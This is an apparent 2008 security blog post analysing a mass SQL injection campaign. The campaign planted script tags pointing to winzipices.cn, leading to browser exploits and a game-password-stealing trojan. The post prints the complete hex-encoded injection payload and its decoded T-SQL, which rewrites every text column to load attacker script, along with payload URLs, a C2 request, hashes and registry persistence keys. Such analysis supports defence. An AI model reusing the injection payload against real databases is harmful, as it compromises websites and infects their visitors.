Monday, May 12, 2008

winzipices.cn SQL injection

Mass SQL injection attacks continue....

SQL Injection:

Injected SQL statement:
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D00220068007400740070003A002F002F00770069006E007A006900700069006300650073002E0063006E002F0033002E006A00730022003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S)

The CAST hex decodes to:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''script src="http: //winzipices[dot]cn/3.js" script''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

The SQL injection appears to come from the automated CLI/SQL injection tool referenced at SANS. The user-agent utlilized during injection was: Mozilla/3.0+(compatible;+Indy+Library)

winzipices.cn site code:
injected script: http: //winzipices[dot]cn/3.js

3.js returns iframe for http: //winzipices[dot]cn/3.asp

3.asp returns iframes for pp.htm and s.asp and a tracking script for http: //s126[dot]cnzz[dot]com/stat.php?id=888134&web_id=888134&show=pic1

pp.htm returns script reference for pp.js

pp.js does a browser check. IE6 goes to 6.gif, IE7 goes to 7.gif

6.gif returns a script reference for vv.js and iframes for le.gif, old.gif and xin.gif

7.gif returns iframes for old.gif and xin.gif

le.gif and vv.js return MDAC (MS06-014) exploit
old.gif returns RealPlayer exploit (CVE-2007-5601)
xin.gif returns RealPlayer exploit (CVE-2008-1309)

Payload for all is: http: //61[dot]188[dot]38[dot]158/images/test.exe

malware analysis:

Filename: test.exe
MD5: afdb42512a91ae960d07397226f24494
Size: 27.5 KB (28,237 bytes)

The file test.exe copies itself as c:\WINDOWS\Tasks\0x01xx8p.exe and hooks itself into spoolsv.exe

receives instructions from http: //766598[dot]com/config.txt (222.187.105.196).

GET /config.txt HTTP/1.1
User-Agent: Downing
Host: 766598.com
Cache-Control: no-cache

config.txt returns commands for several connections:
http: //61[dot]188[dot]38[dot]158/images/test.exe
http: //winzipices[dot]cn/1.exe
http: //766598[dot]com/tongji/post.asp

new test.exe:
Filename: test.exe
MD5: 8ca53bf2b7d8107d106da2da0f8ca700
Size: 27.5 KB (28,237 bytes)

Filename: 1.exe (PSW.OnlineGames trojan)
MD5: 5c9322a95aaafbfabfaf225277867f5b
Size: 37.5 KB (38,400 bytes)

1.exe creates 3 tmp files: datx.tmp (x = number) with hooks into winlogin.exe

Filename: dat6.tmp
MD5: 96ee4d2d791d123c87692a5e838ed549
Size: 12.0 KB (12,288 bytes)

Filename: dat7.tmp
MD5: 9473d4397a0793c709a4ec365fb3f0d3
Size: 21.5 KB (22,016 bytes)

Filename: dat8.tmp
MD5: 69d308d862fefa4548d87545b387dda9
Size: 6.50 KB (6,656 bytes)

Registry:
HKEY_CLASSES_ROOT\CLSID\{E25C29AB-12B9-4523-A53C-324B5FBA648C}\InProcServer32 "(Default)"
Type: REG_SZ
Data: C:\DOCUME~1\userx\LOCALS~1\Temp\dat6.tmp

Data:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "Shell"
Type: REG_SZ
Data: "C:\WINDOWS\System32\Rundll32.exe" "C:\WINDOWS\System32\shell32.dll",Control_RunDLL "C:\DOCUME~1\userx\LOCALS~1\Temp\dat6.tmp"


...all in an effort to drop a PSW.OnlineGames trojan